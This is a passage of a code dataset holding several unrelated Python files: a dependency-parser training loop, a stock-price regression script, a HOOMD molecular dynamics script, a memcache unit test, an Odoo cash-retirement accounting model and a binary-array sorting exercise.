_ in enumerate(upper_morphtag_encodings):\n if index > 0:\n upper_morphtag_encodings [index] = \\\n self.mtag_wsum_composition_alpha * upper_morphtag_encodings[index-1] + \\\n (1 - self.mtag_wsum_composition_alpha) * upper_morphtag_encodings[index]\n for entry, mtag in zip(conll_sentence, upper_morphtag_encodings):\n entry.vec = concatenate([entry.vec, dynet.dropout(mtag, 0.33)])\n\n for idx, entry in enumerate(conll_sentence):\n entry.pos_lstms = [entry.vec, entry.vec]\n entry.headfov = None\n entry.modfov = None\n\n entry.rheadfov = None\n entry.rmodfov = None\n\n #POS tagging loss\n lstm_forward = self.pos_builders[0].initial_state()\n lstm_backward = self.pos_builders[1].initial_state()\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.pos_lstms[1] = lstm_forward.output()\n rentry.pos_lstms[0] = lstm_backward.output()\n\n for entry in conll_sentence:\n entry.pos_vec = concatenate(entry.pos_lstms)\n\n blstm_forward = self.pos_bbuilders[0].initial_state()\n blstm_backward = self.pos_bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.pos_vec)\n blstm_backward = blstm_backward.add_input(rentry.pos_vec)\n entry.pos_lstms[1] = blstm_forward.output()\n rentry.pos_lstms[0] = blstm_backward.output()\n\n concat_layer = [dynet.dropout(concatenate(entry.pos_lstms), 0.33) for entry in conll_sentence]\n outputFFlayer = self.ffSeqPredictor.predict_sequence(concat_layer)\n posIDs = [self.pos.get(entry.pos) for entry in conll_sentence]\n for pred, gold in zip(outputFFlayer, posIDs):\n posErrs.append(self.pick_neg_log(pred, gold))\n\n pos_encodings = []\n for entry, poses in zip(conll_sentence, outputFFlayer):\n pos_encodings.append(self.plookup[np.argmax(poses.value())])\n upper_pos_encodings = []\n if self.pos_encoding_composition_type == \"pos_attention\":\n for idx, encoding in enumerate(pos_encodings):\n tmp = []\n if idx - 1 > 0:\n tmp.append(pos_encodings[idx-1])\n tmp.append(encoding) \n if idx+1 < len(pos_encodings):\n tmp.append(pos_encodings[idx+1])\n upper_pos_encodings.append(self.attend_encodings(tmp, self.pos_encoding_composition_type))\n else:\n upper_pos_encodings = pos_encodings\n\n if self.pos_wsum_composition_alpha != 0:\n for index, _ in enumerate(upper_pos_encodings):\n if index > 0:\n upper_pos_encodings [index] = \\\n self.pos_wsum_composition_alpha * upper_pos_encodings[index-1] + \\\n (1 - self.pos_wsum_composition_alpha) * upper_pos_encodings[index]\n\n for entry, pos in zip(conll_sentence, upper_pos_encodings):\n entry.vec = concatenate([entry.vec, dynet.dropout(pos, 0.33)])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n # Add predicted pos tags\n for entry, poses in zip(conll_sentence, outputFFlayer):\n entry.vec = concatenate([entry.vec, dynet.dropout(self.plookup[np.argmax(poses.value())], 0.33)])\n entry.lstms = [entry.vec, entry.vec]\n \"\"\"\n #Parsing losses\n if self.blstmFlag:\n lstm_forward = self.builders[0].initial_state()\n lstm_backward = self.builders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n lstm_forward = lstm_forward.add_input(entry.vec)\n lstm_backward = lstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = lstm_forward.output()\n rentry.lstms[0] = lstm_backward.output()\n\n if self.bibiFlag:\n for entry in conll_sentence:\n entry.vec = concatenate(entry.lstms)\n\n blstm_forward = self.bbuilders[0].initial_state()\n blstm_backward = self.bbuilders[1].initial_state()\n\n for entry, rentry in zip(conll_sentence, reversed(conll_sentence)):\n blstm_forward = blstm_forward.add_input(entry.vec)\n blstm_backward = blstm_backward.add_input(rentry.vec)\n\n entry.lstms[1] = blstm_forward.output()\n rentry.lstms[0] = blstm_backward.output()\n\n scores, exprs = self.__evaluate(conll_sentence)\n gold = [entry.parent_id for entry in conll_sentence]\n heads = decoder.parse_proj(scores, gold if self.costaugFlag else None)\n\n if self.labelsFlag:\n\n concat_layer = [dynet.dropout(self.__getRelVector(conll_sentence, head, modifier + 1), 0.33) for\n modifier, head in enumerate(gold[1:])]\n outputFFlayer = self.ffRelPredictor.predict_sequence(concat_layer)\n relIDs = [self.rels[conll_sentence[modifier + 1].relation] for modifier, _ in enumerate(gold[1:])]\n for pred, goldid in zip(outputFFlayer, relIDs):\n lerrs.append(self.pick_neg_log(pred, goldid))\n\n e = sum([1 for h, g in zip(heads[1:], gold[1:]) if h != g])\n eerrors += e\n if e > 0:\n loss = [(exprs[h][i] - exprs[g][i]) for i, (h, g) in enumerate(zip(heads, gold)) if h != g] # * (1.0/float(e))\n eloss += (e)\n mloss += (e)\n errs.extend(loss)\n\n etotal += len(conll_sentence)\n\n if iSentence % 1 == 0:\n if len(errs) > 0 or len(lerrs) > 0 or len(posErrs) > 0 or len(segErrs) > 0 or len(mTagErrs) > 0:\n eerrs = (esum(errs + lerrs + posErrs + segErrs + mTagErrs))\n eerrs.scalar_value()\n eerrs.backward()\n self.trainer.update()\n errs = []\n lerrs = []\n posErrs = []\n segErrs = []\n mTagErrs = []\n\n renew_cg()\n\n print(\"Loss: %.4f\" % (mloss / iSentence))\n","sub_path":"learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":52994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"593917022","text":"from Common.get_data import get_data_yahoo\nfrom sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nimport numpy as np\n\ndf = get_data_yahoo('GGAL')\ndf['Close_Next'] = df['Close'].shift(-1).fillna(0)\n\nvariable_objetivo = 'Close_Next'\nvariables_independientes = ['Close','Open','High','Low']\n\nmodelo = LinearRegression()\nmodelo.fit(X=df[variables_independientes], y=df[variable_objetivo])\n\ndf['Close_Next_P'] = modelo.predict(df[variables_independientes])\n\nprint(df[['Date', 'Open', 'Close', 'Close_Next','Close_Next_P']].tail(30))\n\nfig, ax = plt.subplots(figsize=(16, 9))\nplt.title('{}'.format('GGAL'))\nplt.style.use('seaborn')\nax.plot(df['Date'], df['Close_Next'])\nax.plot(df['Date'], df['Close_Next_P'], label=\"Long EMA\", color=\"green\")\n\nax.set_xlabel('Date')\nax.set_ylabel('Adjusted closing price ($)')\nax.legend()\nplt.savefig(\"{}.png\".format('GGAL'))\nplt.close(fig)\nplt.clf()\n\nprint(np.sqrt(metrics.mean_squared_error(df['Close_Next'], df['Close_Next_P'])))","sub_path":"LinearRegression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"589038014","text":"#!/usr/bin/python\n################################################################\n#\n# DESCRIPTION\n# This example reads a configuration from a .gsd file at temperature T_ini,\n# and thermalizes it at temperature T_final.\n#\n#\n# To display help:\n# python ReadAndThermalize.py --user=\"-h\"\n#\n# To launch a simulation:\n# python ReadAndThermalize.py --user=\"filename --dt=dt \"\n#\n# List of arguments:\n# filename\n# -N Natoms\n# -s seed (<0: /dev/urandom)\n# -t if>0:Max time steps, if<0: number of NVT steps between thermalization checks\n# -T temperature\n# --tauT tau of the thermostat\n# -d MD integration step dt\n# --thermostat thermostat\n################################################################\n\nfrom __future__ import print_function #for compatibility with python3.5\nimport hoomd #hoomd is the MD package from the Glotzer group\nfrom hoomd import md #md is the subsection strictly about the properties of the system\nimport sys #this has some system tools like sys.exit() that can be useful\nfrom os import remove #Used to remove the backup file at the end of the run\nimport argparse #for processing arguments\nimport numpy as np #Handles some mathematical operations\nfrom lib import module_potentials as pot\nfrom lib import module_measurements as med\nfrom lib import module_timelists as tl\nimport gsd.pygsd #gsd is the database type for the configurations\nimport gsd.hoomd #\n\n\nprint(\"hoomd version \",hoomd.__version__)\nprint(\"gsd version \",gsd.__version__)\n\n################################################################\n#\n# SET UP THE SIMULATION CONTEXT\n# \n################################################################\nhoomd.context.initialize()\nhoomd.option.set_notice_level(0)\nmore_arguments=hoomd.option.get_user() #These are the arguments that are not read by hoomd\n\n################################################################\n#\n# READ ARGUMENTS\n# Read command line arguments\n#\n# filename\n# -N Natoms\n# -s seed (<0: /dev/urandom)\n# -t if>0:Max time steps, if<0: number of NVT steps between thermalization checks\n# -T temperature\n# --tauT tau of the thermostat\n# -d MD integration step dt\n# --thermostat thermostat\n# --deltaHeavyTraj Every deltaHeavyTraj steps a configuration is saved. This configuration\n# can be used to calculate the self-intermediate scattering function or as\n# a starting point in case at some point crystallization was reached.\n#\n################################################################\nparser = argparse.ArgumentParser(add_help=True)\nparser.add_argument('filename', #positional argument\n nargs=1,\n help='name of the .gsd configuration we want to read'\n)\nparser.add_argument('-N','--Natoms', #mandatory\n nargs=1,\n type=int,\n required=True,\n help='number of atoms in the system'\n)\nparser.add_argument('-l','--label', #optional argument\n nargs=1,\n required=False,\n default=['thermalized'],\n help='basename for the output files'\n)\nparser.add_argument('-s','--seed', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[-1],\n help='seed for random numbers. If negative we get it from /dev/urandom'\n)\nparser.add_argument('-t','--nNVTsteps', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[10000],\n help='It is the total length of the run (mind that the run often starts at t>0, since we read a backup file). Cannot be negative.'\n)\nparser.add_argument('-T','--temperature', #optional argument\n nargs=1,\n type=float,\n required=False,\n default=[5],\n help='target Temperature'\n)\nparser.add_argument('--tauT', #optional argument\n nargs=1,\n type=float,\n required=False,\n default=[1.0],\n help='tau of the thermostat'\n)\nparser.add_argument('--dt', #optional argument\n nargs=1,\n type=float,\n required=False,\n default=[0.002],\n help='dt for MD integration'\n)\nparser.add_argument('--thermostat', #optional argument\n nargs=1,\n required=False,\n default=['NVE'],\n help='basename of the output files'\n)\n\nparser.add_argument('--heavyTrajFreq', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[0],\n help='interval between heavy trajectory backups (default:0, means no backups)'\n)\nparser.add_argument('--backupFreq', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[0],\n help='interval between backups (default:0, means no backups)'\n)\nparser.add_argument('--iframe', #optional argument\n nargs=1,\n type=int,\n required=False,\n default=[0],\n help='Specify from which frame of the gsd file we want the starting configuration (default:0, the first frame)'\n)\nparser.add_argument('--trajFreq', #optional argument\n type=int,\n required=False,\n default=[0],\n help='save trajectory every trajFreq steps (default:0, means no trajectory). If negative, use a logarithmic succession\\\n of times, where -trajFreq is the number of configurations in the trajectory (or slightly less, since some times two \\\n logarithmic times correspond to the same integer time step).'\n)\nparser.add_argument('--addsteps', #optional argument\n type=bool,\n required=False,\n default=[False],\n help='If True, nNVTsteps are done from the input configuration. If False, we substract ini_step. [Default: False]'\n)\nparser.add_argument('--startfromzero', #optional argument\n type=bool,\n required=False,\n default=[False],\n help='If True, the time step is set to zero once the configuration is read. [Default: False]'\n)\nargs = parser.parse_args(more_arguments)\nfilename=args.filename[0]\nNatoms=args.Natoms[0]\nlabel=args.label[0]\nseed=args.seed[0]\nheavyTrajFreq=args.heavyTrajFreq[0]\nbackupFreq=args.backupFreq[0]\ntrajFreq=args.trajFreq\niframe=args.iframe[0]\naddsteps=args.addsteps\nstartfromzero=args.startfromzero\n\nnNVTsteps=args.nNVTsteps[0]\n\nTemperatureGoal=args.temperature[0]\ntauT=args.tauT[0]\ndt=args.dt[0]\nthermostat=args.thermostat[0]\ndel parser\n\nif seed>0:\n np.random.seed(seed)\nprint(\"Input configuration: \",filename)\nprint(\"Natoms = \",Natoms)\nprint(\"seed = \",seed)\nprint(\"nNVTsteps = \",nNVTsteps)\nprint(\"T = \",TemperatureGoal)\nprint(\"tauT = \",tauT)\nprint(\"dt = \",dt)\nprint(\"thermostat = \",thermostat)\nprint(\"label = \",label)\nassert(nNVTsteps>0)\nassert(TemperatureGoal>0)\nassert(tauT>0)\nassert(dt>0 and dt<0.1)\n\n################################################################\n#\n# READ CONFIGURATION\n#\n################################################################\nbackupname=label+\"_backup.gsd\"\nsystem = hoomd.init.read_gsd(filename=filename, restart=backupname, frame=iframe)\nprint(\"The read configuration has \",len(system.particles),\" particles\")\nassert(Natoms==len(system.particles))\niniStep=hoomd.get_step()\nprint(\"iframe: \",iframe)\nprint(\"Initial step: \",iniStep)\n\n\n################################################################\n# \n# SET UP POTENTIAL\n#\n################################################################\nNeighborsListLJ = md.nlist.cell()\nprint(\" *** Setting Kob-Anderesen Potential *** \")\nif Natoms<500:\n\tmyLjPair=pot.KApotentialShort(NeighborsListLJ)\nelse:\n\tmyLjPair=pot.KApotential(NeighborsListLJ)\n\n################################################################\n# \n# SET UP ANALYZER\n#\n################################################################\nprint(\"\\n\\n\\nSET UP ANALYZER\\n\")\n\n#Name of the log\nlogname=label+\".txt\"\n\n#These are the observables we want to log\nanalyzerManyVariables_quantities = ['temperature', 'pressure', 'potential_energy', 'kinetic_energy', 'momentum'] #, 'volume', 'num_particles']\n\nprint(\"In \",logname,\" we write \",analyzerManyVariables_quantities)\n\n#Every how many integrations we want to log the observables\nanalyzer_period=int(5./dt) #Take measurements once every 5 Lennard Jones times\nanalyzerManyVariables = hoomd.analyze.log(filename=logname, \\\n quantities=analyzerManyVariables_quantities, period=analyzer_period, \\\n header_prefix = '#seed:'+str(seed)+\"\\n#\", \\\n overwrite=False,\n phase=0)\n\n\n################################################################\n# \n# INTEGRATION\n# \n################################################################\n\nrunSteps = max(0,nNVTsteps-iniStep) if addsteps==False else nNVTsteps #If negative, we run no steps\nprint(\"runSteps = \",runSteps)\n\n\nmd.integrate.mode_standard(dt=dt)\nmd.update.zero_momentum(phase=-1)\nif backupFreq>0:\n hoomd.dump.gsd(filename=backupname, overwrite=True, truncate=True, period=backupFreq, group=hoomd.group.all(), phase=0)\nif heavyTrajFreq>0:\n hoomd.dump.gsd(filename='heavyTraj.gsd', overwrite=False, period=heavyTrajFreq, group=hoomd.group.all())\nif trajFreq>0:\n hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, period=trajFreq, group=hoomd.group.all(),phase=0)\nelif trajFreq<0:\n nt=-trajFreq\n it=0\n listat=tl.ListaLogaritmica(1, runSteps, nt, ints=True, addzero=True)\n hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, period=None, group=hoomd.group.all(),phase=-1)\n print(\"listat:\", listat)\n nt=len(listat) #Since it's a logarithmic list of integers, it might end up having less elements than declare\n\n\n\n\n\nif thermostat == 'NVT' :\n print(runSteps,\" NVT steps with the Nose-Hoover thermostat at T=\",TemperatureGoal)\n integrator = md.integrate.nvt(group=hoomd.group.all(), kT=TemperatureGoal, tau=tauT)\n md.update.zero_momentum(period=10,phase=0)\n if trajFreq>=0:\n hoomd.run(runSteps, quiet=False)\n else:\n for it in range(nt-1):\n fewSteps=listat[it+1]-listat[it]\n hoomd.run(fewSteps, quiet=False)\n hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, period=None, group=hoomd.group.all(),phase=-1)\n it+=1\n\nelif thermostat == 'NVE' :\n print(runSteps,\" NVE steps with the NVE thermostat\")\n integrator = md.integrate.nve(group=hoomd.group.all())\n md.update.zero_momentum(period=10,phase=0)\n if trajFreq>=0:\n hoomd.run(runSteps, quiet=False)\n else:\n for it in range(nt-1):\n fewSteps=listat[it+1]-listat[it]\n hoomd.run(fewSteps, quiet=False)\n hoomd.dump.gsd(filename='trajectory'+label+'.gsd', overwrite=False, period=None, group=hoomd.group.all(),phase=-1)\n it+=1\n\n\nelif thermostat == 'MB' :\n if trajFreq>=0:\n print(runSteps,\" NVT steps with the Andersen thermostat at T=\",TemperatureGoal)\n stepsTauT = int(tauT/dt)\n md.update.zero_momentum(period=10,phase=0)\n integrator = md.integrate.nve(group=hoomd.group.all())\n while(hoomd.get_step()\n\n\"\"\"Test with_memcache util decorator\"\"\"\n\nfrom unittest import TestCase\nimport mock\nfrom ddt import data, ddt, unpack\nfrom appengine import base\nfrom ggrc.cache.memcache import cached\n\n\n@ddt\n@base.with_memcache\nclass TestMemcacheDecorator(TestCase):\n \"\"\"Test decorator to emulate memcache in test\"\"\"\n\n TESTKEYS = ('1', '2', '3')\n\n # 2 test required for checking invalidation cache for each test case\n @data(TESTKEYS, TESTKEYS)\n @unpack\n def test_simple(self, *keys):\n \"\"\"Simple test\n\n add value in cache\n check it's invalidation on each test\"\"\"\n for key in keys:\n self.assertIsNone(self.memcache_client.get(key))\n val = key * 10\n self.memcache_client.add(key, val)\n self.assertEqual(val, self.memcache_client.get(key))\n\n def test_expire(self):\n \"\"\"Test decorator to emulate cache expire\"\"\"\n def test_func():\n pass\n cached_test_func = cached(test_func)\n cached_test_func.memcache_client.get = mock.Mock(side_effect=['1', None])\n self.assertEqual(cached_test_func(), '1')\n self.assertEqual(cached_test_func(), None)\n","sub_path":"test/unit/appengine/test_memcache_decorator.py","file_name":"test_memcache_decorator.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214466604","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\nfrom urllib.parse import urlencode\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass CashRetirement(models.Model):\n _name = \"cash.retirement\"\n _description = \"Cash retirement Request Form\"\n _inherit = [\"mail.thread\", \"mail.activity.mixin\"]\n _order = \"create_date DESC\"\n\n def _default_department(\n self,\n ): # this method is to search the hr.employee and return the user id of the person clicking the form atm\n user = (\n self.env[\"hr.employee\"]\n .sudo()\n .search([(\"user_id\", \"=\", self.env.uid)])\n )\n return user.department_id.id\n\n def _get_user(self):\n return self.env.uid\n\n def _default_employee(\n self,\n ): # this method is to search the hr.employee and return the user id of the person clicking the form atm\n return self.env[\"hr.employee\"].sudo().search([(\"user_id\", \"=\", self.env.uid)])\n\n @api.model\n def _default_currency(self):\n return self.env.user.company_id.currency_id\n\n def _get_default_account(self):\n \"\"\"Return the Receivable account of partner\"\"\"\n partner = self.env.user.partner_id\n receivable_account_id = partner.with_context(\n force_company=self.env.user.company_id.id).property_account_receivable_id\n if receivable_account_id:\n return receivable_account_id.id\n return False\n\n def _get_default_journal(self):\n \"\"\"Return the Receivable account of partner\"\"\"\n journal_id = self.env['ir.config_parameter'].sudo().get_param(\n 'sunray_cash_advance.advance_journal_id')\n return int(journal_id)\n\n def _get_company(self):\n return self.env.user.company_id\n\n name = fields.Char(\n string=\"Order Reference\",\n readonly=True,\n required=True,\n index=True,\n copy=False,\n default=\"/\",\n )\n note = fields.Char(\n string=\"Description\",\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n state = fields.Selection(\n [\n (\"draft\", \"New\"),\n (\"submit\", \"Submitted\"),\n (\"approve\", \"Approved\"),\n (\"close\", \"Closed\"),\n (\"reject\", \"Reject\"),\n ],\n string=\"Status\",\n readonly=False,\n index=True,\n copy=False,\n default=\"draft\",\n track_visibility=\"onchange\",\n )\n date = fields.Date(\n string=\"Date\",\n required=True,\n track_visibility=\"onchange\",\n default=date.today(),\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n employee_id = fields.Many2one(\n comodel_name=\"hr.employee\",\n required=True,\n string=\"Employee\",\n track_visibility=\"onchange\",\n default=_default_employee,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n manager_id = fields.Many2one(\n comodel_name=\"hr.employee\",\n string=\"Employee Manager\",\n compute=\"_get_employee_manager\",\n )\n department_id = fields.Many2one(\n comodel_name=\"hr.department\",\n string=\"Department\",\n related=\"employee_id.department_id\",\n )\n currency_id = fields.Many2one(\n comodel_name=\"res.currency\",\n required=True,\n string=\"Currency\",\n default=_default_currency,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n total_amount = fields.Float(\n string=\"Total amount\", compute=\"get_total_amount\", readonly=True\n )\n line_ids = fields.One2many(\n comodel_name=\"cash.retirement.line\",\n inverse_name=\"retirement_id\",\n string=\"Request Lines\",\n copy=True,\n )\n move_ids = fields.Many2many(\n comodel_name=\"account.move\", string=\"Accounting Entry\", readonly=True\n )\n journal_id = fields.Many2one(\n comodel_name=\"account.journal\", string=\"Journal\", default=_get_default_journal)\n advance_id = fields.Many2one(\n comodel_name=\"cash.advance\",\n string=\"Cash Advance\",\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n domain=\"[('user_id', '=', user_id), ('state', 'in', ('approve', 'post'))]\",\n )\n amount_advance = fields.Float(\n string=\"Advance Amount\", related=\"advance_id.total_amount\"\n )\n invoices_count = fields.Integer(\n string=\"Invoices\", compute=\"count_invoices\")\n user_id = fields.Many2one(\n comodel_name=\"res.users\",\n required=True,\n string=\"User\",\n default=_get_user,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n account_id = fields.Many2one(\n comodel_name=\"account.account\", string=\"Account\",\n default=_get_default_account\n )\n company_id = fields.Many2one(\n comodel_name=\"res.company\",\n string=\"Company\",\n default=_get_company,\n required=True,\n readonly=True,\n states={\"draft\": [(\"readonly\", False)]},\n )\n \n @api.model\n def create(self, values):\n values[\"name\"] = self.env['ir.sequence'].next_by_code(\"cash.retirement\")\n return super(CashRetirement, self).create(values)\n \n def _get_record_url(self):\n for record in self:\n base_url = self.env['ir.config_parameter'].sudo().get_param(\"web.base.url\")\n url = base_url\n params = {\n \"id\": record.id,\n \"action\": int(self.env.ref('sunray_cash_advance.action_cash_retirement')),\n \"model\": self._name,\n \"view_type\": \"form\",\n \"menu_id\": int(self.env.ref('hr_expense.menu_hr_expense_root')),\n }\n encoded_parameters = urlencode(params)\n if params:\n url = f\"{base_url}/web#{encoded_parameters}\"\n return url\n\n def _get_employee_manager(self):\n self.manager_id = (\n self.employee_id.parent_id\n and self.employee_id.parent_id.id\n or self.department_id.manager_id\n and self.department_id.manager_id.id\n or False\n )\n\n def count_invoices(self):\n self.invoices_count = len(self.move_ids.ids)\n\n def action_view_invoices(self):\n action = self.env.ref(\"account.action_move_journal_line\")\n result = action.read()[0]\n if len(self.move_ids) != 1:\n result[\"domain\"] = \"[('id', 'in', \" + str(self.move_ids.ids) + \")]\"\n elif len(self.move_ids) == 1:\n res = self.env.ref(\"account.view_move_form\", False)\n result[\"views\"] = [(res and res.id or False, \"form\")]\n result[\"res_id\"] = self.move_ids.id\n return result\n\n @api.multi\n def unlink(self):\n if any(self.filtered(lambda advance: advance.state not in [\"draft\"])):\n raise UserError(\n \"You can't delete a retirement that is not in draft state\"\n )\n res = super(CashRetirement, self).unlink()\n return res\n\n @api.onchange(\"advance_id\")\n def onchange_advance_id(self):\n if self.advance_id:\n self.line_ids.unlink()\n line_copy = [\n (\n 0,\n 0,\n {\n \"product_id\": line.product_id.id,\n \"name\": line.name,\n \"account_id\": line.product_id.property_account_expense_id.id,\n \"quantity\": line.quantity,\n \"price_unit\": line.price_unit,\n \"amount\": line.amount,\n \"analytic_account_id\": None\n },\n )\n for line in self.advance_id.line_ids\n ]\n return {\"value\": {\"line_ids\": line_copy}}\n\n @api.multi\n def submit(self):\n if not self.line_ids:\n return UserError(\"Please add lines!\")\n for line_no, line in enumerate(self.line_ids):\n if not line.analytic_account_id:\n raise ValidationError(\n f\"Please add an analytic (site code) account on Retirement line {line_no+1}!\")\n email_template = self.env.ref(\"sunray_cash_advance.retirement_submit\")\n email_template.with_context(url=self._get_record_url()).send_mail(self.id, True)\n self.write({\"state\": \"submit\"})\n return True\n\n def approve(self):\n # TODO: notify coo of this approval\n self.state = \"approve\"\n finance_users = self.env.ref('sunray_cash_advance.group_cash_advance_officer') and self.env.ref('sunray_cash_advance.group_cash_advance_officer').users\n coo_users = self.env.ref('sunray.coo_group') and self.env.ref('sunray.coo_group').users\n mail_template = self.env.ref(\"sunray_cash_advance.retirement_line_manager_approve_notify_finance\")\n finance_employees = self.env['hr.employee'].search([('user_id', 'in', finance_users.ids)])\n for recipient in finance_employees:\n mail_template.with_context(recipient=recipient, url=self._get_record_url()).send_mail(self.id, True)\n mail_template = self.env.ref(\"sunray_cash_advance.retirement_line_manager_approve_notify_coo\")\n coo_employees = self.env['hr.employee'].search([('user_id', 'in', coo_users.ids)])\n for recipient in coo_employees:\n mail_template.with_context(recipient=recipient, url=self._get_record_url()).send_mail(self.id, True)\n return True\n\n @api.multi\n def button_reject(self):\n self.write({\"state\": \"reject\"})\n sender = self.env['hr.employee'].search([('user_id', '=', self.env.user.id)], limit=1)\n mail_template = self.env.ref(\"sunray_cash_advance.retirment_reject\")\n mail_template.template.with_context(recipient=sender, url=self._get_record_url()).send_mail(self.id, True)\n return False\n\n @api.multi\n def set_to_draft(self):\n self.write({\"state\": \"draft\"})\n\n def get_total_amount(self):\n for retirement in self:\n total_amount = 0.0\n for line in retirement.line_ids:\n total_amount += line.amount\n retirement.total_amount = total_amount\n\n def post_entries(self):\n if not self.journal_id:\n raise UserError(\"Please specify a journal!\")\n if not self.account_id:\n raise UserError(\"Please specify a partner receivable account!\")\n if any(not line.account_id for line in self.line_ids):\n raise UserError(\"One or more products has no expense account!\")\n requesting_partner = self.employee_id.user_id.partner_id\n move_vals = {\n \"ref\": self.name,\n \"date\": date.today(),\n \"journal_id\": self.journal_id.id,\n \"amount\": self.total_amount,\n \"line_ids\": [\n (\n 0,\n 0,\n { # Debit the expense account\n \"name\": line.product_id.name,\n \"debit\": line.amount,\n \"credit\": 0.0,\n \"account_id\": line.account_id.id, # Debit employee receivable\n \"analytic_account_id\": line.analytic_account_id.id,\n \"date_maturity\": date.today(),\n \"partner_id\": self.employee_id.user_id.partner_id.id,\n \"description\": self.note,\n },\n )\n for line in self.line_ids\n ]\n + [\n (\n 0,\n 0,\n { # credit receivable account for employee\n \"name\": self.name,\n \"credit\": self.total_amount,\n \"debit\": 0.0,\n \"account_id\": self.account_id.id,\n \"date_maturity\": date.today(),\n \"partner_id\": self.employee_id.user_id.partner_id.id,\n \"description\": self.note,\n },\n )\n ],\n }\n intermediate_journal_id = self.env['account.journal'].browse(int(\n self.env[\"ir.config_parameter\"].sudo().get_param(\"sunray_cash_advance.intermediate_bank_journal_id\")))\n account_move = self.env[\"account.move\"].sudo().with_context(\n company_id=self.env.user.company_id.id, currency_id=self.env.user.company_id.currency_id.id).create(move_vals)\n self.move_ids.unlink()\n self.move_ids += account_move\n if self.advance_id.use_intermediate_account:\n move_vals2 = {\n \"ref\": self.name,\n \"date\": date.today(),\n \"journal_id\": int(self.env[\"ir.config_parameter\"].sudo().get_param(\"sunray_cash_advance.intermediate_bank_journal_id\")),\n \"line_ids\": [( # dr control/transit account\n 0,\n 0,\n {\n \"name\": self.name,\n \"debit\": self.total_amount,\n \"credit\": 0.0,\n \"account_id\": int(self.env[\"ir.config_parameter\"].sudo().get_param(\"sunray_cash_advance.control_account_id\")),\n \"date_maturity\": date.today(),\n \"partner_id\": requesting_partner.id,\n \"company_id\": requesting_partner.company_id.id,\n \"currency_id\": requesting_partner.currency_id.id,\n \"description\": self.note,\n },\n ),\n ( # credit union bank\n 0,\n 0,\n {\n \"name\": self.name,\n \"credit\": self.total_amount,\n \"debit\": 0.0,\n \"account_id\": intermediate_journal_id.default_debit_account_id.id,\n \"date_maturity\": date.today(),\n \"partner_id\": requesting_partner.id,\n \"company_id\": requesting_partner.company_id.id,\n \"currency_id\": requesting_partner.currency_id.id,\n \"description\": self.note,\n },\n ),\n ],\n }\n account_move2 = self.env[\"account.move\"].sudo().with_context(\n company_id=self.env.user.company_id.id, currency_id=self.env.user.company_id.currency_id.id).create(move_vals2)\n self.move_ids += account_move2\n self.paid = True\n self.advance_id.state = \"close\"\n self.state = \"close\"\n return True\n\n\nclass CashRetirementLine(models.Model):\n _name = \"cash.retirement.line\"\n _description = \"retirement Lines\"\n\n retirement_id = fields.Many2one(\n comodel_name=\"cash.retirement\", string=\"retirement\"\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\", string=\"Product\"\n )\n name = fields.Char(string=\"Description\", required=True)\n account_id = fields.Many2one(\n comodel_name=\"account.account\", string=\"Account\", required=True\n )\n analytic_account_id = fields.Many2one(\n comodel_name=\"account.analytic.account\", string=\"Analytic Account\", required=True\n )\n quantity = fields.Integer(string=\"Quantity\", default=1)\n price_unit = fields.Float(string=\"Unit price\")\n amount = fields.Float(\n string=\"Amount\", required=True, compute=\"compute_amount\"\n )\n state = fields.Selection(string=\"State\", related=\"retirement_id.state\")\n\n @api.multi\n def compute_amount(self):\n for line in self:\n line.amount = line.price_unit * line.quantity\n\n @api.onchange(\"product_id\")\n def onchange_product_id(self):\n if self.product_id:\n return {\n \"value\": {\n \"name\": self.product_id.name,\n \"account_id\": self.product_id.property_account_expense_id.id,\n \"price_unit\": self.product_id.lst_price,\n }\n }\n","sub_path":"sunray_cash_advance/models/retirement.py","file_name":"retirement.py","file_ext":"py","file_size_in_byte":16191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"640331048","text":"\"\"\"\nGiven a binary array, sort it in non-decreasing order\n\nInput: First line contains an integer denoting the test cases 'T'. Every test case contains two lines, first line is size and second line is space separated elements of array\n\nOutput: Space separated elements of sorted arrays. There should be a new line between output of every test case.\n\n\nConstraints:\n1 <= Size of Array <= 1000\n10 <= Number of test cases <= 100\n\nExample:\n\nInput:\n2\n5\n1 0 1 1 0\n10\n1 0 1 1 1 1 1 0 0 0\n\nOutput:\n0 0 1 1 1\n0 0 0 0 1 1 1 1 1 1\n\"\"\"\n\nfrom itertools import chain\n\n\nif __name__ == '__main__':\n\n test_cases = int(input())\n\n for i in range(test_cases):\n _n = int(input())\n l = input().split()\n\n binary_sorted = chain(filter(lambda x: x == '0', l), filter(lambda x: x == 